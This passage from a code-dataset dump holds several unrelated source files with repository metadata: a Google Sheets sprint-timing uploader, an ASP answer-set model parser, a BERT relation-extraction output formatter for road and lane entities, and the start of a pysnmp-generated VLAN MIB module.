"Apache-2.0"
] | null | null | null |
sheet.py
|
roocell/myfreelapextract
|
933cf6c50155f0659e3b06f8caf38425920f349d
|
[
"Apache-2.0"
] | null | null | null |
import gspread
from oauth2client.service_account import ServiceAccountCredentials
import pprint
import logging
import random
# https://medium.com/daily-python/python-script-to-edit-google-sheets-daily-python-7-aadce27846c0
# tutorial is older, so the googple API setup is a little outdated
# call directly to test
# python sheettest.py
# create logger
log = logging.getLogger(__file__)
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(filename)s:%(lineno)d %(message)s')
ch.setFormatter(formatter)
log.addHandler(ch)
alphabet = ["A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L",
"M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "X", "Y", "Z"]
#Authorize the API
scope = [
'https://www.googleapis.com/auth/drive',
'https://www.googleapis.com/auth/drive.file'
]
file_name = 'client_key.json'
creds = ServiceAccountCredentials.from_json_keyfile_name(file_name,scope)
client = gspread.authorize(creds)
gsheetfile = 'Dynamic Sprint Velocity Profiling'
# session: this is the text in the 'session' column on myfreelap
# this script will duplicate sheet and rename it based on session
# tagid: the id for the runner, we'll search for this in the sheet
# splits[]: an array of splits to write into the sheet
def updateEntry(session, tagid, splitsStrings):
# splits come in like "00:03.06" need to convert to seconds as float
splits = []
log.debug(splitsStrings)
for s in splitsStrings:
parts = s.split(':')
minutes = float(parts[0])
seconds = float(parts[1])
splits.append(minutes*60+seconds)
# find tagid in roster, if not present, then add one
sheet = client.open(gsheetfile).worksheet("Athlete Roster")
# search C6 to C30
rosterid = sheet.find(tagid)
rosterIdRow = 0
rosterIdCol = 3 # 'C'
if rosterid == None:
# loop through roster list and find an empty
rosterlist = sheet.col_values(rosterIdCol) # 'C'
i = 0
for r in rosterlist:
i = i + 1
if r == "":
rosterIdRow = i+5 # starts @ C6
sheet.update_cell(rosterIdRow, rosterIdCol, tagid)
log.debug("created new tagid at {},{}".format(rosterIdRow, rosterIdCol))
break
else:
rosterIdRow = rosterid.row
rosterIdCol = rosterid.col
log.debug("found existing tagid at {},{}".format(rosterIdRow, rosterIdCol))
# check if the session sheet already exists, if not duplicate it
try:
sheet = client.open(gsheetfile).worksheet(session)
except gspread.exceptions.WorksheetNotFound:
# duplicate template sheet and rename to session
sheet = client.open(gsheetfile).worksheet("template")
log.debug("creating {} from template".format(session))
sheet.duplicate(insert_sheet_index=None, new_sheet_name=session)
sheet = client.open(gsheetfile).worksheet(session)
# update distance and cones/gates
cones = len(splits)+1
distance = 40
if "60" in session:
distance = 60
elif "100" in session:
distance = 100
log.debug("updating distance and cones {} {}".format(distance, cones))
sheet.update_cell(3, 8, distance) # H3
sheet.update_cell(3, 12, cones) # L3
# need to delete the "Cone / Gate Placement" rows that aren't required.
# J6:P6
#cell = sheet.find("Cone / Gate Placement")
log.debug("clearing Cone / Gate Placement to fix plot x-axis")
start = alphabet[alphabet.index("G") + len(splits)] + str(6)
end = "P6"
cell_list = sheet.range(start + ":" + end)
for i, val in enumerate(cell_list):
cell_list[i].value = ""
sheet.update_cells(cell_list)
# wait for copied sheet to update with tagid
# (alternative) determine row of tagid from above)
# in the session sheet udpate splits
# splits start in 'G'
# roster -> session mapping rows
# 6,7,8,9... -> 10, 21, 32, 43....
# https://alteredqualia.com/visualization/hn/sequence/
splitCol = 7 # 'G'
for i, s in enumerate(splits):
splitRow = 11*(rosterIdRow-5)-1
sheet.update_cell(splitRow, splitCol+i, s)
log.debug(splits)
# @TODO append trials rather than just overwrite the first one
# this way you can see the multiple curves on the plot
# there are multiple trials - but we'll just fill in the one for now
# since this is just about the dyanmic plotting.
# dump test sheet if this script is ran directly
def main():
#Fetch the sheet
sheet = client.open(gsheetfile).worksheet("test")
# write some crap into column2
sheet.update('B1', random.randint(1,100))
sheet.update('B2', random.randint(1,100))
sheet.update('B3', random.randint(1,100))
sheet.update('B4', random.randint(1,100))
sheet.update('B5', random.randint(1,100))
# dump the sheet
python_sheet = sheet.get_all_records()
pp = pprint.PrettyPrinter()
pp.pprint(python_sheet)
# test updateEntry()
session = "Hr6 40yrd WK1"
tagid = "3 AC-3476"
splits = ["00:03.06", "00:02.73", "00:03.09"]
updateEntry(session, tagid, splits)
if __name__ == "__main__":
main()
| 35.529801
| 97
| 0.641007
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,225
| 0.414725
|
3694d1a4cd60ecc1e34d895dba4a09639f943705
| 3,426
|
py
|
Python
|
image_generation/parse_models.py
|
pudumagico/clevr-dataset-gen
|
1e7e5e2585ae021b2a3f0ea509e5fa63f3d26b86
|
[
"BSD-3-Clause"
] | null | null | null |
image_generation/parse_models.py
|
pudumagico/clevr-dataset-gen
|
1e7e5e2585ae021b2a3f0ea509e5fa63f3d26b86
|
[
"BSD-3-Clause"
] | null | null | null |
image_generation/parse_models.py
|
pudumagico/clevr-dataset-gen
|
1e7e5e2585ae021b2a3f0ea509e5fa63f3d26b86
|
[
"BSD-3-Clause"
] | null | null | null |
import sys
import re
from typing import Sized
def parse_models(models_file):
color = re.compile(r'hasColor\(\d,\w+\)')
shape = re.compile(r'hasShape\(\d,\w+\)')
size = re.compile(r'hasSize\(\d,\w+\)')
texture = re.compile(r'hasTexture\(\d,\w+\)')
out_color = re.compile(r'outHasColor\(\d,\w+\)')
out_shape = re.compile(r'outHasShape\(\d,\w+\)')
out_size = re.compile(r'outHasSize\(\d,\w+\)')
out_texture = re.compile(r'outHasTexture\(\d,\w+\)')
models = []
next_line_model = False
with open(models_file) as file:
for line in file.readlines():
if next_line_model:
models.append(line.strip())
next_line_model = False
if 'Answer' in line:
next_line_model = True
positive_models = []
negative_models = []
for model in models:
out_positions = []
positive_model = ''
negative_model = ''
colors = color.findall(model)
shapes = shape.findall(model)
sizes = size.findall(model)
textures = texture.findall(model)
positive_model = colors + shapes + sizes + textures
positive_model = ' '.join(positive_model)
positive_models.append(positive_model)
out_colors = out_color.findall(model)
out_shapes = out_shape.findall(model)
out_sizes = out_size.findall(model)
out_textures = out_texture.findall(model)
for e in out_colors:
position = int(re.search(r'\d', e).group())
if position and position not in out_positions:
out_positions.append(position)
negative_model += re.sub('outHasColor', 'hasColor', e) + ' '
for e in out_shapes:
negative_model += re.sub('outHasShape', 'hasShape', e) + ' '
for e in out_sizes:
negative_model += re.sub('outHasSize', 'hasSize', e) + ' '
for e in out_textures:
negative_model += re.sub('outHasTexture', 'hasTexture', e) + ' '
for e in colors:
position = int(re.search(r'\d', e).group())
if position in out_positions:
continue
else:
negative_model += e + ' '
for e in shapes:
position = int(re.search(r'\d', e).group())
if position in out_positions:
continue
else:
negative_model += e + ' '
for e in sizes:
position = int(re.search(r'\d', e).group())
if position in out_positions:
continue
else:
negative_model += e + ' '
for e in textures:
position = int(re.search(r'\d', e).group())
if position in out_positions:
continue
else:
negative_model += e + ' '
negative_models.append(negative_model.strip())
print(positive_models)
print('asd')
print(negative_models)
for i in range(len(positive_models)):
text_file = open("asp_models/positive_" + str(i) + ".lp", "w")
text_file.write(positive_models[i])
text_file.close()
for i in range(len(negative_models)):
text_file = open("asp_models/negative_" + str(i) + ".lp", "w")
text_file.write(negative_models[i])
text_file.close()
if __name__ == '__main__':
base_model = parse_models(sys.argv[1])
| 31.722222
| 76
| 0.558669
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 415
| 0.121133
|
3694d7e8c0ea23a87ec0351e6dfd24cef2e1613b
| 17,193
|
py
|
Python
|
Codes of the SMD2II model/Codes of Transfer-learning of Bert (stage I classification)/produce_submit_json_file.py
|
0AnonymousSite0/Social-media-data-to-Interrelated-informtion-to-Parameters-of-virtual-road-model
|
3043f316bf6af3530dec894881c8f63607084759
|
[
"MIT"
] | 1
|
2022-03-26T10:40:10.000Z
|
2022-03-26T10:40:10.000Z
|
Codes of the SMD2II model/Codes of Transfer-learning of Bert (stage I classification)/produce_submit_json_file.py
|
0AnonymousSite0/Social-media-data-to-Interrelated-informtion-to-Parameters-of-virtual-road-model
|
3043f316bf6af3530dec894881c8f63607084759
|
[
"MIT"
] | null | null | null |
Codes of the SMD2II model/Codes of Transfer-learning of Bert (stage I classification)/produce_submit_json_file.py
|
0AnonymousSite0/Social-media-data-to-Interrelated-informtion-to-Parameters-of-virtual-road-model
|
3043f316bf6af3530dec894881c8f63607084759
|
[
"MIT"
] | null | null | null |
# coding=utf-8
import os
import json
# 获取最新模型预测数据文件夹
def get_latest_model_predict_data_dir(new_epochs_ckpt_dir=None):
# 获取文件下最新文件路径
def new_report(test_report):
lists = os.listdir(test_report) # 列出目录的下所有文件和文件夹保存到lists
lists.sort(key=lambda fn: os.path.getmtime(test_report + "/" + fn)) # 按时间排序
file_new = os.path.join(test_report, lists[-1]) # 获取最新的文件保存到file_new
return file_new
if new_epochs_ckpt_dir is None:
# 获取分类预测输出文件路径
input_new_epochs = os.path.join(
os.path.abspath(os.path.join(os.path.dirname(__file__), "output")), "sequnce_infer_out")
# 获取最新周期文件路径
new_ckpt_dir = new_report(input_new_epochs)
input_new_epochs_ckpt = os.path.join(input_new_epochs, new_ckpt_dir)
# 获取最新周期下最新模型文件路径
new_epochs_ckpt_dir = new_report(input_new_epochs_ckpt)
if not os.path.exists(new_ckpt_dir):
raise ValueError("路径不存在!{}".format(new_epochs_ckpt_dir))
return new_epochs_ckpt_dir
# dict is comes from raw_data all_50_schemas
schemas_dict_relation_2_object_subject_type = {
'Road_status':[('Status','Road')],
'Lane_status':[('Status','Lane')],
'Road_position':[('Position_of_road','Road')],
# 'At':[('Road','Road')],
# 'PRIOR':[('Road','Road')],
# 'PAST':[('Road','Road')],
# 'Bet':[('Road','Road')],
'Lane_of_Road':[('Road','Lane')],
'Lane_direction':[('Direction_of_lane','Lane')],
'Lane_position':[('Position_of_lane','Lane')],
'Road_direction':[('Direction_of_road','Road')],
#'Lane_number':[('Number','Lane')]
# '父亲': [('人物', '人物')],
# '妻子': [('人物', '人物')],
# '母亲': [('人物', '人物')],
# '丈夫': [('人物', '人物')],
# '祖籍': [('地点', '人物')],
# '总部地点': [('地点', '企业')],
# '出生地': [('地点', '人物')],
# '目': [('目', '生物')],
# '面积': [('Number', '行政区')],
# '简称': [('Text', '机构')],
# '上映时间': [('Date', '影视作品')],
# '所属专辑': [('音乐专辑', '歌曲')],
# '注册资本': [('Number', '企业')],
# '首都': [('城市', '国家')],
# '导演': [('人物', '影视作品')],
# '字': [('Text', '历史人物')],
# '身高': [('Number', '人物')],
# '出品公司': [('企业', '影视作品')],
# '修业年限': [('Number', '学科专业')],
# '出生日期': [('Date', '人物')],
# '制片人': [('人物', '影视作品')],
# '编剧': [('人物', '影视作品')],
# '国籍': [('国家', '人物')],
# '海拔': [('Number', '地点')],
# '连载网站': [('网站', '网络小说')],
# '朝代': [('Text', '历史人物')],
# '民族': [('Text', '人物')],
# '号': [('Text', '历史人物')],
# '出版社': [('出版社', '书籍')],
# '主持人': [('人物', '电视综艺')],
# '专业代码': [('Text', '学科专业')],
# '歌手': [('人物', '歌曲')],
# '作词': [('人物', '歌曲')],
# '主角': [('人物', '网络小说')],
# '董事长': [('人物', '企业')],
# '成立日期': [('Date', '机构'), ('Date', '企业')],
# '毕业院校': [('学校', '人物')],
# '占地面积': [('Number', '机构')],
# '官方语言': [('语言', '国家')],
# '邮政编码': [('Text', '行政区')],
# '人口数量': [('Number', '行政区')],
# '所在城市': [('城市', '景点')],
# '作者': [('人物', '图书作品')],
# '作曲': [('人物', '歌曲')],
# '气候': [('气候', '行政区')],
# '嘉宾': [('人物', '电视综艺')],
# '主演': [('人物', '影视作品')],
# '改编自': [('作品', '影视作品')],
# '创始人': [('人物', '企业')]
}
class File_Management(object):
"""读取TXT文件,以列表形式返回文件内容"""
def __init__(self, TEST_DATA_DIR=None, MODEL_OUTPUT_DIR=None, Competition_Mode=True):
self.TEST_DATA_DIR = TEST_DATA_DIR
self.MODEL_OUTPUT_DIR = get_latest_model_predict_data_dir(MODEL_OUTPUT_DIR)
self.Competition_Mode = Competition_Mode
def file_path_and_name(self):
text_sentence_file_path = os.path.join(self.TEST_DATA_DIR, "text_and_one_predicate.txt")
token_in_file_path = os.path.join(self.TEST_DATA_DIR, "token_in_not_UNK_and_one_predicate.txt")
predicate_token_label_file_path = os.path.join(self.MODEL_OUTPUT_DIR, "token_label_predictions.txt")
file_path_list = [text_sentence_file_path, token_in_file_path, predicate_token_label_file_path]
file_name_list = ["text_sentence_list", "token_in_not_NUK_list ", "token_label_list",]
if not self.Competition_Mode:
spo_out_file_path = os.path.join(self.TEST_DATA_DIR, "spo_out.txt")
if os.path.exists(spo_out_file_path):
file_path_list.append(spo_out_file_path)
file_name_list.append("reference_spo_list")
return file_path_list, file_name_list
def read_file_return_content_list(self):
file_path_list, file_name_list = self.file_path_and_name()
content_list_summary = []
for file_path in file_path_list:
with open(file_path, "r", encoding='utf-8') as f:
content_list = f.readlines()
content_list = [content.replace("\n", "") for content in content_list]
content_list_summary.append(content_list)
if self.Competition_Mode:
content_list_length_summary = [(file_name, len(content_list)) for content_list, file_name in
zip(content_list_summary, file_name_list)]
file_line_number = self._check_file_line_numbers(content_list_length_summary)
print("Competition_Mode=True, check file line pass!")
print("输入文件行数一致,行数是: ", file_line_number)
else:
file_line_number = len(content_list_summary[0])
print("first file line number: ", file_line_number)
print("do not check file line! if you need check file line, set Competition_Mode=True")
print("\n")
return content_list_summary, file_line_number
def _check_file_line_numbers(self, content_list_length_summary):
content_list_length_file_one = content_list_length_summary[0][1]
for file_name, file_line_number in content_list_length_summary:
assert file_line_number == content_list_length_file_one
return content_list_length_file_one
class Sorted_relation_and_entity_list_Management(File_Management):
"""
生成按概率大小排序的可能关系列表和按照原始句子中顺序排序的实体列表
"""
def __init__(self, TEST_DATA_DIR, MODEL_OUTPUT_DIR, Competition_Mode=False):
File_Management.__init__(self, TEST_DATA_DIR=TEST_DATA_DIR, MODEL_OUTPUT_DIR=MODEL_OUTPUT_DIR, Competition_Mode=Competition_Mode)
# 关系列表 把模型输出的实数值对应为标签
#self.relationship_label_list = ['丈夫', '上映时间', '专业代码', '主持人', '主演', '主角', '人口数量', '作曲', '作者', '作词', '修业年限', '出品公司', '出版社', '出生地', '出生日期', '创始人', '制片人', '占地面积', '号', '嘉宾', '国籍', '妻子', '字', '官方语言', '导演', '总部地点', '成立日期', '所在城市', '所属专辑', '改编自', '朝代', '歌手', '母亲', '毕业院校', '民族', '气候', '注册资本', '海拔', '父亲', '目', '祖籍', '简称', '编剧', '董事长', '身高', '连载网站', '邮政编码', '面积', '首都']
self.relationship_label_list = ['Road_status','Lane_status','At','PRIOR', 'PAST', 'Bet', 'LaneOfRoad','Lane_direction','Lane_position','Road_direction','Lane_number']
self.Competition_Mode = Competition_Mode
print("test数据输入路径是:\t{}".format(self.TEST_DATA_DIR))
print("最新模型预测结果路径是:\t{}".format(self.MODEL_OUTPUT_DIR))
def get_input_list(self,):
content_list_summary, self.file_line_number = self.read_file_return_content_list()
if len(content_list_summary) == 4:
[text_sentence_list, token_in_not_NUK_list, token_label_list, reference_spo_list] = content_list_summary
elif len(content_list_summary) == 3:
[text_sentence_list, token_in_not_NUK_list, token_label_list] = content_list_summary
reference_spo_list = [None] * len(text_sentence_list)
else:
raise ValueError("check code!")
print(reference_spo_list)
return text_sentence_list, token_in_not_NUK_list, token_label_list, reference_spo_list
#合并由WordPiece切分的词和单字
def _merge_WordPiece_and_single_word(self, entity_sort_list):
# [..['B-SUB', '新', '地', '球', 'ge', '##nes', '##is'] ..]---> [..('SUB', '新地球genesis')..]
entity_sort_tuple_list = []
for a_entity_list in entity_sort_list:
entity_content = ""
entity_type = None
for idx, entity_part in enumerate(a_entity_list):
if idx == 0:
entity_type = entity_part
if entity_type[:2] not in ["B-", "I-"]:
break
else:
if entity_part.startswith("##"):
entity_content += entity_part.replace("##", "")
else:
entity_content += entity_part
if entity_content != "":
entity_sort_tuple_list.append((entity_type[2:], entity_content))
return entity_sort_tuple_list
# 把spo_out.txt 的[SPO_SEP] 分割形式转换成标准列表字典形式
# 妻子 人物 人物 杨淑慧 周佛海[SPO_SEP]丈夫 人物 人物 周佛海 杨淑慧 ---> dict
def preprocessing_reference_spo_list(self, refer_spo_str):
refer_spo_list = refer_spo_str.split("[SPO_SEP]")
refer_spo_list = [spo.split(" ") for spo in refer_spo_list]
refer_spo_list = [dict([('predicate', spo[0]),
('object_type', spo[2]), ('subject_type', spo[1]),
('object', spo[4]), ('subject', spo[3])]) for spo in refer_spo_list]
print(refer_spo_list)
refer_spo_list.sort(key= lambda item:item['predicate'])
return refer_spo_list
# 把模型输出实体标签按照原句中相对位置输出
def model_token_label_2_entity_sort_tuple_list(self, token_in_not_UNK_list, predicate_token_label_list):
"""
:param token_in_not_UNK: ['紫', '菊', '花', '草', '是', '菊', '目', ',', '菊', '科', ',', '松', '果', '菊', '属', '的', '植', '物']
:param predicate_token_label: ['B-SUB', 'I-SUB', 'I-SUB', 'I-SUB', 'O', 'B-OBJ', 'I-OBJ', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O']
:return: [('SUB', '紫菊花草'), ('OBJ', '菊目')]
"""
# 除去模型输出的特殊符号
def preprocessing_model_token_lable(predicate_token_label_list, token_in_list_lenth):
# ToDo:检查错误,纠错
if predicate_token_label_list[0] == "[CLS]":
predicate_token_label_list = predicate_token_label_list[1:] # y_predict.remove('[CLS]')
if len(predicate_token_label_list) > token_in_list_lenth: # 只取输入序列长度即可
predicate_token_label_list = predicate_token_label_list[:token_in_list_lenth]
return predicate_token_label_list
# 预处理标注数据列表
predicate_token_label_list = preprocessing_model_token_lable(predicate_token_label_list, len(token_in_not_UNK_list))
entity_sort_list = []
entity_part_list = []
#TODO:需要检查以下的逻辑判断,可能写的不够完备充分
for idx, token_label in enumerate(predicate_token_label_list):
# 如果标签为 "O"
if token_label == "O":
# entity_part_list 不为空,则直接提交
if len(entity_part_list) > 0:
entity_sort_list.append(entity_part_list)
entity_part_list = []
# 如果标签以字符 "B-" 开始
if token_label.startswith("B-"):
# 如果 entity_part_list 不为空,则先提交原来 entity_part_list
if len(entity_part_list) > 0:
entity_sort_list.append(entity_part_list)
entity_part_list = []
entity_part_list.append(token_label)
entity_part_list.append(token_in_not_UNK_list[idx])
# 如果到了标签序列最后一个标签处
if idx == len(predicate_token_label_list) - 1:
entity_sort_list.append(entity_part_list)
# 如果标签以字符 "I-" 开始 或者等于 "[##WordPiece]"
if token_label.startswith("I-") or token_label == "[##WordPiece]":
# entity_part_list 不为空,则把该标签对应的内容并入 entity_part_list
if len(entity_part_list) > 0:
entity_part_list.append(' ') #英文需要这一行,中文不需要这一行
entity_part_list.append(token_in_not_UNK_list[idx])
# 如果到了标签序列最后一个标签处
if idx == len(predicate_token_label_list) - 1:
entity_sort_list.append(entity_part_list)
# 如果遇到 [SEP] 分隔符,说明需要处理的标注部分已经结束
if token_label == "[SEP]":
break
entity_sort_tuple_list = self._merge_WordPiece_and_single_word(entity_sort_list)
print(entity_sort_tuple_list)
return entity_sort_tuple_list
# 生成排好序的关系列表和实体列表
def produce_relationship_and_entity_sort_list(self):
text_sentence_list, token_in_not_NUK_list, token_label_list, reference_spo_list = self.get_input_list()
for [text_sentence, token_in_not_UNK, token_label, refer_spo_str] in\
zip(text_sentence_list, token_in_not_NUK_list, token_label_list, reference_spo_list):
text = text_sentence.split("\t")[0]
text_predicate = text_sentence.split("\t")[1]
token_in = token_in_not_UNK.split("\t")[0].split(" ")
token_in_predicate = token_in_not_UNK.split("\t")[1]
assert text_predicate == token_in_predicate
token_label_out = token_label.split(" ")
entity_sort_tuple_list = self.model_token_label_2_entity_sort_tuple_list(token_in, token_label_out)
if self.Competition_Mode:
yield text, text_predicate, entity_sort_tuple_list, None
else:
if refer_spo_str is not None:
refer_spo_list = self.preprocessing_reference_spo_list(refer_spo_str)
else:
refer_spo_list = []
yield text, text_predicate, entity_sort_tuple_list, refer_spo_list
# 打印排好序的关系列表和实体列表
def show_produce_relationship_and_entity_sort_list(self):
idx = 0
for text, text_predicate, entity_sort_tuple_list, refer_spo_list in self.produce_relationship_and_entity_sort_list():
print("序号: ", idx + 1)
print("原句: ", text)
print("预测的关系: ", text_predicate)
print("预测的实体: ", entity_sort_tuple_list)
print("参考的 spo_slit:", refer_spo_list)
print("\n")
idx += 1
if idx == 100:
break
def produce_output_file(self, OUT_RESULTS_DIR=None, keep_empty_spo_list=False):
filename = "subject_predicate_object_predict_output.json"
output_dict = dict()
for text, text_predicate, entity_sort_tuple_list, refer_spo_list in self.produce_relationship_and_entity_sort_list():
object_type, subject_type = schemas_dict_relation_2_object_subject_type[text_predicate][0]
subject_list = [value for name, value in entity_sort_tuple_list if name == "SUB"]
subject_list = list(set(subject_list))
subject_list = [value for value in subject_list if len(value) >= 2]
object_list = [value for name, value in entity_sort_tuple_list if name == "OBJ"]
object_list = list(set(object_list))
object_list = [value for value in object_list if len(value) >= 2]
if len(subject_list) == 0 or len(object_list) == 0:
output_dict.setdefault(text, [])
for subject_value in subject_list:
for object_value in object_list:
output_dict.setdefault(text, []).append({"object_type": object_type, "predicate": text_predicate,
"object": object_value, "subject_type": subject_type,
"subject": subject_value})
if keep_empty_spo_list:
filename = "keep_empty_spo_list_" + filename
if OUT_RESULTS_DIR is None:
out_path = filename
else:
out_path = os.path.join(OUT_RESULTS_DIR, filename)
print("生成结果的输出路径是:\t{}".format(out_path))
if not os.path.exists(OUT_RESULTS_DIR):
os.makedirs(OUT_RESULTS_DIR)
result_json_write_f = open(out_path, "w", encoding='utf-8')
count_line_number = 0
count_empty_line_number = 0
for text, spo_list in output_dict.items():
count_line_number += 1
line_dict = dict()
line_dict["text"] = text
line_dict["spo_list"] = spo_list
line_json = json.dumps(line_dict, ensure_ascii=False)
if len(spo_list) == 0:
count_empty_line_number += 1
if keep_empty_spo_list:
result_json_write_f.write(line_json + "\n")
else:
if len(spo_list) > 0:
result_json_write_f.write(line_json + "\n")
print("empty_line: {}, line: {}, percentage: {:.2f}%".format(count_empty_line_number, count_line_number,
(count_empty_line_number / count_line_number) * 100))
if __name__=='__main__':
TEST_DATA_DIR = "bin/subject_object_labeling/sequence_labeling_data/test"
# MODEL_OUTPUT_DIR = "output/sequnce_infer_out/epochs9/ckpt20000"
MODEL_OUTPUT_DIR = None
OUT_RESULTS_DIR = "output/final_text_spo_list_result"
Competition_Mode = True
spo_list_manager = Sorted_relation_and_entity_list_Management(TEST_DATA_DIR, MODEL_OUTPUT_DIR, Competition_Mode=Competition_Mode)
spo_list_manager.produce_output_file(OUT_RESULTS_DIR=OUT_RESULTS_DIR, keep_empty_spo_list=True)
| 49.834783
| 370
| 0.600651
| 14,736
| 0.765944
| 1,212
| 0.062997
| 0
| 0
| 0
| 0
| 6,545
| 0.340194
|
36957809b7a097e9aca4a9f73c606e574242991c
| 18,656
|
py
|
Python
|
pysnmp-with-texts/SW-VLAN-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 8
|
2019-05-09T17:04:00.000Z
|
2021-06-09T06:50:51.000Z
|
pysnmp-with-texts/SW-VLAN-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 4
|
2019-05-31T16:42:59.000Z
|
2020-01-31T21:57:17.000Z
|
pysnmp-with-texts/SW-VLAN-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module SW-VLAN-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/SW-VLAN-MIB
# Produced by pysmi-0.3.4 at Wed May 1 15:12:44 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ValueSizeConstraint, ConstraintsUnion, ConstraintsIntersection, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsUnion", "ConstraintsIntersection", "SingleValueConstraint")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
enterprises, iso, ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, Counter32, Integer32, Unsigned32, Gauge32, IpAddress, ObjectIdentity, MibIdentifier, Counter64, TimeTicks, NotificationType = mibBuilder.importSymbols("SNMPv2-SMI", "enterprises", "iso", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "Counter32", "Integer32", "Unsigned32", "Gauge32", "IpAddress", "ObjectIdentity", "MibIdentifier", "Counter64", "TimeTicks", "NotificationType")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
class MacAddress(OctetString):
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(6, 6)
fixedLength = 6
class VlanIndex(Integer32):
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(1, 4094)
class PortList(OctetString):
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(12, 12)
fixedLength = 12
marconi = MibIdentifier((1, 3, 6, 1, 4, 1, 326))
systems = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2))
external = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20))
dlink = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1))
dlinkcommon = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 1))
golf = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2))
golfproducts = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 1))
es2000 = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 1, 3))
golfcommon = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2))
marconi_mgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2)).setLabel("marconi-mgmt")
es2000Mgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28))
swL2Mgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2))
swVlan = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8))
swVlanCtrl = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 1))
swMacBaseVlan = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2))
swPortBaseVlan = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3))
swVlanCtrlMode = MibScalar((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("mac-base", 3), ("ieee8021q", 4), ("port-base", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swVlanCtrlMode.setStatus('mandatory')
if mibBuilder.loadTexts: swVlanCtrlMode.setDescription('This object controls which Vlan function will be enable (or disable) when the switch hub restart at the startup (power on) or warm start.')
swVlanInfoStatus = MibScalar((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("mac-base", 3), ("ieee8021q", 4), ("port-base", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swVlanInfoStatus.setStatus('mandatory')
if mibBuilder.loadTexts: swVlanInfoStatus.setDescription('This object indicates which Vlan function be enable (or disable) in mandatoryly stage. There are no effect when change swVlanCtrlMode vlaue in the system running.')
swVlanSnmpPortVlan = MibScalar((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 1, 3), VlanIndex()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swVlanSnmpPortVlan.setStatus('mandatory')
if mibBuilder.loadTexts: swVlanSnmpPortVlan.setDescription('Indicates the Vlan which the SNMP port belongs to. The value range is 1 to 4094.')
swMacBaseVlanInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 1))
swMacBaseVlanMaxNum = MibScalar((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swMacBaseVlanMaxNum.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanMaxNum.setDescription('The maximum number of Mac base Vlan allowed by the system.')
